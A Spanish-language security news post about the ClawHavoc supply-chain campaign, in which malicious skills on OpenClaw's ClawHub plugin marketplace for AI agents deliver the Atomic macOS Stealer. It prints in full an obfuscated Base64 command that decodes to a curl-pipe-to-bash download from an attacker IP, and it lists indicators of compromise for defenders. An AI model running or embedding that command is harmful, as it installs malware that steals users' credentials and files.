Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon OpenClaw, nuevo blanco en ola de ataques de envenenamiento de la cadena de suministro


OpenClaw, una plataforma de agentes de IA de código abierto en rápido crecimiento, enfrenta graves riesgos en su cadena de suministro, ya que los atacantes envenenan su mercado de plugins ClawHub con "habilidades" maliciosas. Las firmas de seguridad SlowMist y Koi Security han descubierto cientos de extensiones comprometidas que despliegan infostealers como Atomic Stealer. OpenClaw permite a los agentes de IA locales automatizar flujos de trabajo, interactuar con servicios y controlar dispositivos.








OpenClaw, una plataforma de agentes de IA de código abierto en rápido crecimiento, enfrenta graves riesgos en su cadena de suministro ya que los atacantes envenenan su mercado de plugins ClawHub con habilidades maliciosas.

Las firmas de seguridad SlowMist y Koi Security han descubierto cientos de extensiones comprometidas que despliegan infostealers como Atomic Stealer.

OpenClaw permite a los agentes de IA locales automatizar flujos de trabajo, interactuar con servicios y controlar dispositivos a través de "habilidades", extensiones modulares alojadas en ClawHub.

Las habilidades siguen la especificación AgentSkills, principalmente como carpetas SKILL.md que contienen instrucciones ejecutables en lugar de código auditable. Este diseño convierte el Markdown de documentación en puntos de entrada operativos, lo que lo hace propenso al abuso.

El proceso de carga permisivo de ClawHub carece de revisiones rigurosas, reflejando vulnerabilidades en mercados como npm o VS Code. Su popularidad ha aumentado recientemente, atrayendo tanto a desarrolladores como a atacantes.

 

Koi Security escaneó 2.857 habilidades en ClawHub, identificando 341 maliciosas —una tasa de infección del 12%— en una campaña denominada ClawHavoc. SlowMist consolidó IOCs de más de 400 muestras, señalando 472 habilidades afectadas con infraestructura compartida.

Las habilidades maliciosas se agrupan en torno a herramientas de criptomonedas (como rastreadores de Solana o carteras Phantom), utilidades de YouTube, bots de Polymarket y typosquats como "clawhub1". Se hacen pasar por actualizadores, comprobaciones de seguridad o ayudas financieras para eludir la vigilancia.

Desglose de la cadena de ataque

Los atacantes incrustan payloads de dos etapas en los "prerrequisitos" de SKILL.md. Los usuarios decodifican comandos ofuscados en Base64 como echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=' | base64 -D | bash, lo que desencadena descargas curl | bash.

Los dropper de primera etapa obtienen scripts desde IPs como 91.92.242.30, que luego descargan binarios de segunda etapa (por ejemplo, x5ki60w1ih838sp7). Estos son Mach-O universales firmados ad-hoc que coinciden con Atomic macOS Stealer (AMOS), el cual copia datos de Escritorio/Documentos, los exfiltra a C2s como socifiapp.com y roba credenciales de Keychain/navegadores, según el análisis de SlowMist.

El análisis dinámico revela diálogos de phishing para contraseñas, archivado ZIP de archivos .txt/.pdf y subidas mediante curl. La reutilización de dominios/IPs (como 91.92.242.30 vinculado al grupo de extorsión Poseidon) indica operaciones organizadas.

Una habilidad popular de "Tendencias de X (Twitter)" oculta puertas traseras en Base64 que imitan salidas de configuración. Al decodificarlas, se obtienen descargas desde 91.92.242.30/q0c7ew2ro8l2cfqp, que enlazan con dyrtvwjfveyxjf23 —un stealer que apunta a carpetas de macOS—. Esto evade escáneres de palabras clave mientras permite intercambios rápidos de payloads.

IOCs

IOCs de dominio

TipoIndicador
Dominiosocifiapp[.]com
Dominiorentry[.]co
Dominioinstall[.]app-distribution.net

IOCs de URL

TipoIndicador
URLhxxp[:]//91.92.242.30/7buu24ly8m1tn8m4
URLhxxp[:]//91.92.242.30/x5ki60w1ih838sp7
URLhxxp[:]//91.92.242.30/528n21ktxu08pmer
URLhxxp[:]//91.92.242.30/66hfqv0uye23dkt2
URLhxxp[:]//91.92.242.30/6x8c0trkp4l9uugo
URLhxxp[:]//91.92.242.30/dx2w5j5bka6qkwxi
URLhxxp[:]//54.91.154.110:13338/
URLhxxp[:]//91.92.242.30/6wioz8285kcbax6v
URLhxxp[:]//91.92.242.30/1v07y9e1m6v7thl6
URLhxxp[:]//91.92.242.30/q0c7ew2ro8l2cfqp
URLhxxp[:]//91.92.242.30/dyrtvwjfveyxjf23
URLhxxps[:]//rentry.co/openclaw-core
URLhxxps[:]//glot.io/snippets/hfdxv8uyaf
URLhxxp[:]//92.92.242.30/7buu24ly8m1tn8m4
URLhxxp[:]//95.92.242.30/7buu24ly8m1tn8m4
URLhxxps[:]//install.app-distribution.net/setup/
URLhxxp[:]//11.92.242.30/7buu24ly8m1tn8m4
URLhxxp[:]//202.161.50.59/7buu24ly8m1tn8m4
URLhxxp[:]//96.92.242.30/7buu24ly8m1tn8m4
URLhxxps[:]//glot.io/snippets/hfd3x9ueu5

IOCs de IP

TipoIndicador
IP91.92.242[.]30
IP104.18.38[.]233
IP95.92.242[.]30
IP54.91.154[.]110
IP92.92.242[.]30
IP11.92.242[.]30
IP202.161.50[.]59
IP96.92.242[.]30

IOCs de archivos

TipoNombre de archivoSHA256
Archivodyrtvwjfveyxjf2330f97ae88f8861eeadeb54854d47078724e52e2ef36dd847180663b7f5763168
Archivo66hfqv0uye23dkt20e52566ccff4830e30ef45d2ad804eefba4ffe42062919398bf1334aab74dd65
Archivox5ki60w1ih838sp71e6d4b0538558429422b71d1f4d724c8ce31be92d299df33a8339e32316e2298
Archivodx2w5j5bka6qkwxi998c38b430097479b015a68d9435dc5b98684119739572a4dff11e085881187e
Archivoopenclaw-agent.exe17703b3d5e8e1fe69d6a6c78a240d8c84b32465fe62bed5610fb29335fe42283


Fuentes:
https://cybersecuritynews.com/openclaw-supply-chain-attacks/

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.